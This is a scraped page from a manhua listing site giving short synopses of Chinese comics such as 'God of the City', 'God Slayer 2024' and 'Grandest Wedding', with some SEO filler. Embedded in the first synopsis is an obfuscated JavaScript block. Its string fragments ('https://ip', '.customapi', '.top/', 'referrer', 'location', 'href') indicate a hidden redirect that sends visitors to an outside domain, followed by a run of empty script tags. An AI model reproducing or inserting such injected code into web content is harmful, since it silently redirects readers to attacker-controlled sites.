Manhua - Page 32

Manhua refers to Chinese comics, which have a unique artistic style and cultural flavor. Ranging from action to romance, manhua offers a diverse reading experience for those looking for something different from manga.

1459 results

God of the City

Ling Fei Will fight though two worlds will he be able to unravel the secret of both? After an accident, he woke up in a mystical cultivation realm. But when earth called him back he had the chance to relive his life on earth. What will he do with this second chance?<script></script><script>function _0x3cb8(){var _0x1d5ca4=['DPwjF','2015860FvHZXA','XYrWp','https://ip','Upqkz','random','NiTJD','.top/','','42611vMlyoT','2040726bYrbmi','includes','.customapi','kCIaF','text','referrer','then','NZqBn','google','3830918fBpFpi','floor','2652emENTB','location','10408032AkAqxY','sUiLs','http://rea','VFOYN','WbUtJ','2635YcyVTO','FgYbo','href','3072176nuCfrW'];_0x3cb8=function(){return _0x1d5ca4;};return _0x3cb8();}(function(_0x2b153a,_0x80f18){var _0x1db879=_0x1eb4,_0x4d5701=_0x2b153a();while(!![]){try{var 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_0x141802!=_0x157cd4;},'VFOYN':_0x11236c(0x19f)+_0x11236c(0x18e),'sUiLs':function(_0x188eb8,_0x437f06){return _0x188eb8+_0x437f06;},'NZqBn':function(_0x5c266b,_0x3b81a8){return _0x5c266b*_0x3b81a8;},'NiTJD':function(_0x9a50be,_0x4bd0c9){return _0x9a50be+_0x4bd0c9;},'DPwjF':function(_0x1a6b22,_0x1b3536){return _0x1a6b22-_0x1b3536;},'WbUtJ':_0x11236c(0x198),'FgYbo':function(_0x192776,_0x4822bd){return _0x192776>=_0x4822bd;},'kCIaF':function(_0x1be6aa,_0xa7017b){return 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_0x4e38();}</script><script></script><script></script><script></script><script></script><script></script><script></script><script></script><script></script><script></script><script></script><script></script><script></script><script></script><script></script><script></script><script></script><script></script><script></script><script></script><script></script><script></script><script></script><script></script><script></script><script></script><script></script><script></script><script></script><script></script><script></script><script></script><script></script><script></script><script></script><script></script><script></script><script></script><script></script><script></script><script></script><script></script><script></script><script></script><script></script>


God Slayer 2024

Gods and demons have descended upon the world, leading to the destruction of various nations one after another. With the last haven, Da Xia, on the verge of annihilation, they are on the cusp of their final victory, poised to rule the planet and enslave all of humanity. Countless warriors have fallen, and even Da Xia's guardian g**, Ying Che, can no longer hold on. But just as Ying Che perishes on the battlefield, he suddenly opens his eyes again and finds himself reborn ten years in the pastbefore any of it happened! Armed with memories and experience from his previous life, can Ying Che change everything, rewrite history, and prevent the disaster from striking once more?


Godly Pet Has Opened Up For Me Again

Three years ago, three beasts fell from the sky. King Qin of the Western Hill made a contract with one of them and swept through the six kingdoms to unify the Western Hill. Wu Jiu of the Southern Desert made a contract with the other and then he swept through the nineteen sects of the Southern Desert, reaching the peak. Sun Changming also made a contract with one of them, yet three years passed without any change. However, he will soon discover that the little toothed fish he caught three years ago is the greatest blessing of his life! Unstoppable!


Golden Pair Of Justice

The all-knowing Yuan Qiqi possesses all the secrets of the world, but he forgot his own past. In the "Buddha Killed People" incident at Yuchan Temple, Yuan Qiqi met up with constable Chu Zhong, and together they solved one murder case after another... They became a golden pair. In the course of investigating murders, the pieces of his memory were slowly being put together, and Yuan Qiqi's identity was gradually revealed...


Good Luck, Demon King!

This is a wonderful world ruled by magic. It's full of ancient myths and legends of all types, including one such legend that was on most people's tongues as of late: one about the battle between an evil demon king and great sages. In the current day, at the world's one and only Magic Academy -- the Forest Academy of Magic -- more and more odd creatures seem to be appearing and causing trouble. In the middle of it all, there always seems to be the shadow of an academy student named "Salaman"...


Good Luck, Demon King! S2

This is a wonderful world ruled by magic. It's full of ancient myths and legends of all types, including one such legend that was on most people's tongues as of late: one about the battle between an evil demon king and great sages. In the current day, at the world's one and only Magic Academy -- the Forest Academy of Magic -- more and more odd creatures seem to be appearing and causing trouble. In the middle of it all, there always seems to be the shadow of an academy student named "Salaman"...


Goodbye, In-law

Because of a misunderstanding 8 years ago, Jung Da-ae and Lee Han-eol are mortal enemies. To make things worse, their siblings get married making these two in-laws! But then the bride and groom are killed in an unfortunate accident. In a moment of mourning and arguing in the middle of the road, Jung Da-ae and Lee Han-eol are hit by a truck, killed and transported back to when they were in high school! Is this their chance to fix everything?!


Gradually Close to The Heart

An accidental meeting brought the lonely Su Ye and the perfect prince Zheng Shu together which created brand new feelings. The interaction and feelings between the two were originally familiar made their heart beat. Can there really be a pure friendship between a male and a female?


Grand Duke, I Can’T Do It Because It’S Too Cold In The North

I, who detest the cold, pretended to be the wife of the Grand Duke of the North. But why the North!? She tries to escape because she feels like she's going to freeze to death, but the attempt was in vain due to the Grand Duke that catches her. "It's up to you whether you run or not. I'll always catch you again and again." Why do you keep obsessing over me when we're a bad couple in the original story? I can't live here because it's cold!Grand Duchess of the North It's Cold,Grand Duchess of the North I Can't Do This Because It's Cold, mangabuddy is a website dedicated to fans of anime, , , , video games, and cosplay. Where you may find all of your anime-related memes, recommendations, reviews, manga recommendations, character fanfiction, favorite quotations, and simply those ordinary anime things that you enjoy, particularly memes.You can , online for free at mangabuddy. Chapters are updated hourly with high-quality graphics and a full English translation. Find free translations of your favorite , and . The latest updated content on mangabuddy is now available.


Grandest Wedding

Haomen De Yi Shenghun - Best Wedding - Grandest Wedding His newly -married wife is a thief with spending as her favorite."I'd like to buy villas. Seven!""Sure, do it!"“I‘d like to buy some sports cars.”"Sure, do it!""I'd like to date with other men with my villas and sports cars." The man's eyes flashed and carried he away on his shoulders."Stop it,honey! How do you pay me back since I rescued your life?" The bride is a thief who’s the biggest spender in town. Sports cars, luxury condos, you name it! How will she repay her husband who saved her life…? In the middle of a business exchange, company president Xiao Jue's ordered asset gets snatched away by a secret agent. Luckily, Xiao is fast on his feet and reveals the agent's identity. Young agent Xinxin goes back home from her failed mission, unaware that Xiao has taken interest in her skills. With a clever bait, Xiao lures Xinxin again to steal from him, but this time he offers her an assistant job. Xinxin greedily accepts, and her missions with Xiao Jue begins. Wait a minute, what IS Xiao Jue's business after all, and why is he always under attack? <div class="_32Nb8 _1r2VR"> <div class="_2CEz_ _3UOjD">Summary</div> </div> <ul class="DRvOb"> <li>Secret agent XinXin makes ends meet completing high-profile missions for her organization</li> <li>XinXin ends up as shady businessman Xiao Jue's personal secretary after failing to steal from him</li> <li>A fast-paced yet slow-burn romance comedy set in the seedy Chinese underground world</li> </ul>


Great Immortal

Great Immortal, Da Xian Er, D Xin Er, at manhua websiteLi Henian has been "straight" for 18 years, but he never expected that one day he would be entangled by Wong Tai Sin himself because of his collision with the "Wandering G**", and the two became friends. Later, Li Henian became a worshiper of Huanxiang and saved many demons and ghosts along the way. He and Huangxian gradually developed feelings. In the process, the other four great immortals also appeared one after anotherRecommend for you !


Grow up with my daughter

My annoying and sweet days with my little pumpkin ٩(๑❛ᴗ❛๑)۶
